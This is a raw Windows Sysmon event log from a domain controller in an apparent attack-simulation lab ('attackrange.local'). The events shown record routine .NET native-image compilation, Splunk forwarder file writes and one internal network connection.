21:07:25.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28D-60D3-1306-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:25.170{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28D-60D3-1306-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.170{4DB9351A-A28C-60D3-1206-00000000CF01}3992NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6OMZIF0M7B\System.ni.dll.auxMD5=47D6C9DD7917E2F787BA947E20BC09EB,SHA256=716177BEEA97107F89D514584402965891162CE681EF39D3078CB63304ADE402,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.170{4DB9351A-A28C-60D3-1206-00000000CF01}3992NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6OMZIF0M7B\System.ni.dllMD5=456DD8A98AB8EE3A27623A1B8922B575,SHA256=3EE8341CADBFA2C1B06FF49E0D612C5C295D31EC1D2412AC18AAF3CE400372DF,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000024047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.842{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A036-60D3-1101-00000000CF01}6784C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:26.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000024044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.780{4DB9351A-A036-60D3-1401-00000000CF01}54566840C:\Windows\system32\conhost.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.764{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:26.764{4DB9351A-A036-60D3-1101-00000000CF01}67842908C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+3d7ae(wow64)|UNKNOWN(0000000001084853)|UNKNOWN(0000000001084504)|UNKNOWN(00000000010854CE)|UNKNOWN(0000000001082845)|UNKNOWN(0000000001080F66)|UNKNOWN(0000000001080950)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+f036(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+122da(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1859b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1992d7(wow64) 23542300x800000000000000024041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.686{4DB9351A-A28E-60D3-1506-00000000CF01}5876NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DRXE7BI8R7\XsdBuildTask.ni.dll.auxMD5=C954DE22DFCAFB62BC1C109024C640BC,SHA256=939D076EA2C4DCE34545868FCFA4DACF3B5A9CD1B65D7CF131A67EBFD551C44E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.686{4DB9351A-A28E-60D3-1506-00000000CF01}5876NT 
AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DRXE7BI8R7\XsdBuildTask.ni.dllMD5=B03E8954E2B34A2B0606EEEF926FA9BD,SHA256=EFCD05CC1A264A2E3C1DD10D2833AFD943C45B93B9BE344F23917B575A9B3833,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000024039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.655{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28E-60D3-1506-00000000CF01}5876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.639{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28E-60D3-1506-00000000CF01}5876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:26.639{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28E-60D3-1506-00000000CF01}5876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.639{4DB9351A-A28D-60D3-1406-00000000CF01}5460NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0O1TVTJQ1G\mscorlib.ni.dll.auxMD5=8800C2118B78F7DECF8FF943AC00E180,SHA256=4FB885DD7E35BDFC4B057A29D1999998335E16BB9758E501D01E0B3F2CB82567,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.623{4DB9351A-A28D-60D3-1406-00000000CF01}5460NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0O1TVTJQ1G\mscorlib.ni.dllMD5=0951E2E07BA2A60B97B32783CB57C827,SHA256=40B3D137627CA7DFCA43AA8AA25A4F53D7D5E3F2B5EDFA770C194C963D839C47,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000024034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.264{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E6B796AF95D6D20E36D6C12765B9AC,SHA256=B293C6FB8E09DFF7130860420DF08689DEE1C1F5A0F661A93F329EA306A61E93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.170{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA65A552C176137A08A0D741DF277E05,SHA256=060696D58A942E731C72112D1C1E4FE15098DEA8448C955F32ACA34BA0C9DD62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.170{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=78B10387F65FFCEA8D7A3E46D741BE8F,SHA256=A8E17ABFD155A8989BF92B1AF2D31E6A6CC2F8CAB2836BC5B7CCC04B96659F77,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000024031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.123{4DB9351A-9DDE-60D3-1600-00000000CF01}12925768C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:26.123{4DB9351A-9DDE-60D3-1600-00000000CF01}12925768C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:27.639{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24D05F825F42B86EFB27E4D9523D0FD5,SHA256=08D8ED7748D8986868C335E53CD0D9D952E7701D8E494A083089A914D5D20FD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:27.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB6EE7F814CB3A0997C2F1507A9AF44B,SHA256=2A40A60D0EA95920F077C005FAB8497EA8FC07B08E4B7FC77324E3FB6AD05716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:28.889{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B975C5A66AF66D8F80FCBC0575C6B271,SHA256=19F75C527E59DC35E160FBA67CCC0485F0F59057B0CA44169F0D98C5BECFEA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:28.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F413D6253891F276094DFD8686B3E5DD,SHA256=53670FF3917AD14B27485E195DB242211D5EDA31B72359A940E03688F79D44A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:29.764{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5=06ECD6792346DC8AAF23A6F711696E96,SHA256=19A2BF10692B3229A38BF109CEB63DBC37629513FE005DF1EF53BEAAF2F2E59D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:29.358{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=625DED54C798577348B86B19283B1379,SHA256=AD5D0BE9305747C2552DEFED36CF481AEA47CEDABBDE9955C4C16CE0C789E380,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:29.162{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61471-false10.0.1.12-8000- 23542300x800000000000000024055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:30.370{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5430A82A4A035BBBE8F6FAE60498FB8,SHA256=5BC4DBF012758FE976D538CB2EEC4BBD34B4D016EC90B8ABAF22CF7B06B38580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:30.092{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=068BCF44A1C16AEBB080017DAA4359CB,SHA256=9D090A199E0B7FE30BFE75039844588435ADBF32E5EFDE20D713468D1EAD0797,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:31.386{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B401F7BE46D0FF7308ABE2E8EB1CE343,SHA256=61A9C716C583EBB5634D633368B9F8ECB883882C7AC6F0AABC73A9F626200F52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:32.401{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE4B3BDABD4FC737E2465AD2E87F2137,SHA256=61507357E0C48B8687F4F9463B5D2FDD4CA809581AB2345F4DBC75FD3CBB49E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:33.401{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E1A2D02D000025E1C1BFF6D6D630E9,SHA256=18F822CA3E6BB8B38EB6DD39DA3B0C8AFCE26999DCC2249E055D71E9DEC93779,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:34.432{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4645D03B971A611B1E1D17916B9073D0,SHA256=F1DAB188E69DAF65A992E4387E5A6F624C81B09B134EAB241628318CDE4EDD4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:35.839{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
